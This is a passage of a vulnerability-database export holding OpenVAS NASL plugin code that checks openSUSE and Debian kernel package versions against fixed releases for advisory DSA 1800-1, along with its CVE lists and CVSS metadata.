rpm:\"kernel-ps3-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3-debugsource\", rpm:\"kernel-ps3-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64\", rpm:\"kernel-ppc64~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3\", rpm:\"kernel-ps3~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64\", rpm:\"kernel-ppc64~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:05", "description": "The remote host is missing an update to linux-2.6\nannounced via advisory DSA 1800-1.", "cvss3": {}, "published": "2009-05-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1800-1 (linux-2.6)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1046", "CVE-2009-0859", "CVE-2009-1184", "CVE-2009-0028", "CVE-2009-1242", "CVE-2009-1072", "CVE-2009-0835", "CVE-2009-1192", "CVE-2009-1338", "CVE-2009-1337", "CVE-2009-0834", "CVE-2009-1265", "CVE-2009-1439"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64034", "href": "http://plugins.openvas.org/nasl.php?oid=64034", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1800_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1800-1 (linux-2.6)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, privilege escalation or a sensitive\nmemory leak. For details, please visit the referenced security\nadvisories.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.26-15lenny2.\n\nFor the oldstable distribution (etch), these problems, where applicable,\nwill be fixed in future updates to linux-2.6 and linux-2.6.24.\n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux packages.\";\ntag_summary = \"The remote host is missing an update to linux-2.6\nannounced via advisory DSA 1800-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201800-1\";\n\n\nif(description)\n{\n script_id(64034);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-25 20:59:33 +0200 (Mon, 25 May 2009)\");\n script_cve_id(\"CVE-2009-0028\", \"CVE-2009-0834\", \"CVE-2009-0835\", \"CVE-2009-0859\", \"CVE-2009-1046\", \"CVE-2009-1072\", \"CVE-2009-1184\", \"CVE-2009-1192\", \"CVE-2009-1242\", \"CVE-2009-1265\", \"CVE-2009-1337\", \"CVE-2009-1338\", \"CVE-2009-1439\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Debian Security Advisory DSA 1800-1 (linux-2.6)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-support-2.6.26-2\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-tree-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-patch-debian-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-2.6.26\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-legacy\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-alpha-legacy\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-generic\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-alpha-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-alpha\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-alpha-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-xen\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-openvz\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-openvz-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-common-vserver\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-openvz-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-xen-amd64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"user-mode-linux\", ver:\"2.6.26-1um-2+15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-orion5x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-ixp4xx\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-footbridge\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-orion5x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-footbridge\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-ixp4xx\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-iop32x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-arm\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-iop32x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-versatile\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-armel\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-versatile\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-hppa\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-parisc-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-parisc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-openvz-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-486\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-686-bigmem\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-openvz-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-modules-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-xen-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-i386\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-686\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-486\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-mckinley\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-itanium\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-ia64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-itanium\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-itanium\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-itanium\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-5kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sb1-bcm91250a\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sb1a-bcm91480b\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sb1-bcm91250a\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-4kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r4k-ip22\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sb1a-bcm91480b\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-mips\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r5k-ip32\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-5kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r4k-ip22\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r5k-ip32\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-4kc-malta\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-mipsel\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-r5k-cobalt\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-r5k-cobalt\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-powerpc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-powerpc-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-s390x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-s390x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-s390\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-s390-tape\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-s390x\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-s390\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-all-sparc\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-vserver-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-vserver-sparc64\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.26-2-sparc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.26-2-sparc64-smp\", ver:\"2.6.26-15lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:24", "description": "The remote host is missing an update to linux-2.6\nannounced via advisory DSA 1800-1.", "cvss3": {}, "published": "2009-05-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1800-1 (linux-2.6)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1046", "CVE-2009-0859", "CVE-2009-1184", "CVE-2009-0028", "CVE-2009-1242", "CVE-2009-1072", "CVE-2009-0835", "CVE-2009-1192", "CVE-2009-1338", "CVE-2009-1337", "CVE-2009-0834", "CVE-2009-1265", "CVE-2009-1439"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064034", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064034", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1800_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1800-1 (linux-2.6)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, privilege escalation or a sensitive\nmemory leak. For details, please visit the referenced security\nadvisories.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.26-15lenny2.\n\nFor the oldstable distribution (etch), these problems, where applicable,\nwill be fixed in future updates to linux-2.6 and linux-2.6.24.\n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux packages.\";\ntag_summary = \"The remote host is missing an update to linux-2.6\nannounced via advisory DSA 1800-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201800-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64034\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-25 20:59:33 +0200 (Mon, 25 May 2009)\");\n script_cve_id(\"CVE-2009-0028\", \"CVE-2009-0834\", \"CVE-2009-0835\", \"CVE-2009-0859\", \"CVE-2009-1046\", \"CVE-2009-1072\", \"CVE-2009-1184\", \"CVE-2009-1192\", \"CVE-2009-1242\", \"CVE-2009-1265\", 